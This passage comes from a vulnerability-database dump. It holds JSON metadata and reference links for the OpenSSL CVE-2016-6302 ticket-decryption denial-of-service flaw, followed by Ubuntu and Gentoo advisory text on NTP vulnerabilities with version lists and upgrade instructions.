security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182185 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 6 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182186 - security advisory" }, { "title": "Red Hat: CVE-2016-6302", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-6302" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-6302" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6302 " }, { "title": "", "trust": 0.1, "url": "https://github.com/holmes-py/reports-summary " }, { "title": "rhsecapi", "trust": 0.1, "url": "https://github.com/redhatofficial/rhsecapi " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "cve-pylib", "trust": 0.1, "url": "https://github.com/redhatproductsecurity/cve-pylib " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "CNNVD", "id": "CNNVD-201608-449" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2016-3090566.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/92628" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2018:2187" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2018:2186" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2018:2185" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036885" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=e97763c92c655dcf4af2860b3abd2bc4c8a267f9" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6302" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6302" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=e97763c92c655dcf4af2860b3abd2bc4c8a267f9" }, { "trust": 0.6, "url": "https://www.openssl.org/news/vulnerabilities.html#y2017" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/commit/1bbe48ab149893a78bf99c8eb8895c928900a16f" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1369855" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3731" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3731" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3737" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.29/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3737" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3736" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3736" }, { "trust": 0.2, "url": "https://issues.jboss.org/):" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-2/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "BID", "id": "92628" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "CNNVD", "id": "CNNVD-201608-449" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "BID", "id": "92628" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "CNNVD", "id": "CNNVD-201608-449" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-16T00:00:00", "db": "VULMON", "id": "CVE-2016-6302" }, { "date": "2016-08-24T00:00:00", "db": "BID", "id": "92628" }, { "date": "2016-09-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2018-07-12T21:45:18", "db": "PACKETSTORM", "id": "148521" }, { "date": "2018-07-12T21:48:57", "db": "PACKETSTORM", "id": "148525" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2018-07-12T21:48:49", "db": "PACKETSTORM", "id": "148524" }, { "date": "2016-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201608-449" }, { "date": "2016-09-16T05:59:12.003000", "db": "NVD", "id": "CVE-2016-6302" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-6302" }, { "date": "2018-02-05T15:00:00", "db": "BID", "id": "92628" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201608-449" }, { "date": "2023-11-07T02:33:56.930000", "db": "NVD", "id": "CVE-2016-6302" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "CNNVD", "id": "CNNVD-201608-449" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of ssl/t1_lib.c of tls_decrypt_ticket Denial of service in function (DoS) Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004781" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201608-449" } ], "trust": 0.6 } }
var-201701-1136
Vulnerability from variot
An exploitable vulnerability exists in the message authentication functionality of libntp in ntp 4.2.8p4 and NTPSec a5fb34b9cc89b92a8fef2f459004865c93bb7f92. An attacker can send a series of crafted messages to attempt to recover the message digest key. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a local security-bypass vulnerability. An attacker can exploit this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ========================================================================== Ubuntu Security Notice USN-3096-1 October 05, 2016
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. (CVE-2015-7973)
Matt Street discovered that NTP incorrectly verified peer associations of symmetric keys. (CVE-2015-7974)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled memory. An attacker could possibly use this issue to cause ntpq to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. (CVE-2015-7975)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled dangerous characters in filenames. An attacker could possibly use this issue to overwrite arbitrary files. (CVE-2015-7976)
Stephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)
Aanchal Malhotra discovered that NTP incorrectly handled authenticated broadcast mode. (CVE-2015-7979)
Jonathan Gardner discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could use this issue to spoof peer servers. (CVE-2015-8138)
Jonathan Gardner discovered that the NTP ntpq utility did not properly handle certain incorrect values. An attacker could possibly use this issue to cause ntpq to hang, resulting in a denial of service. (CVE-2015-8158)
It was discovered that the NTP cronjob incorrectly cleaned up the statistics directory. A local attacker could possibly use this to escalate privileges. (CVE-2016-0727)
Stephen Gray and Matthew Van Gundy discovered that NTP incorrectly validated crypto-NAKs. A remote attacker could possibly use this issue to prevent clients from synchronizing. A remote attacker could possibly use this issue to prevent clients from synchronizing. (CVE-2016-1548)
Matthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that NTP incorrectly handled message authentication. (CVE-2016-1550)
Yihan Lian discovered that NTP incorrectly handled duplicate IPs on unconfig directives. A remote attacker could possibly use this issue to cause a denial of service. A remote attacker could possibly use this issue to cause a denial of service. A remote attacker could possibly use this issue to cause a denial of service. (CVE-2016-4956)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.11
In general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
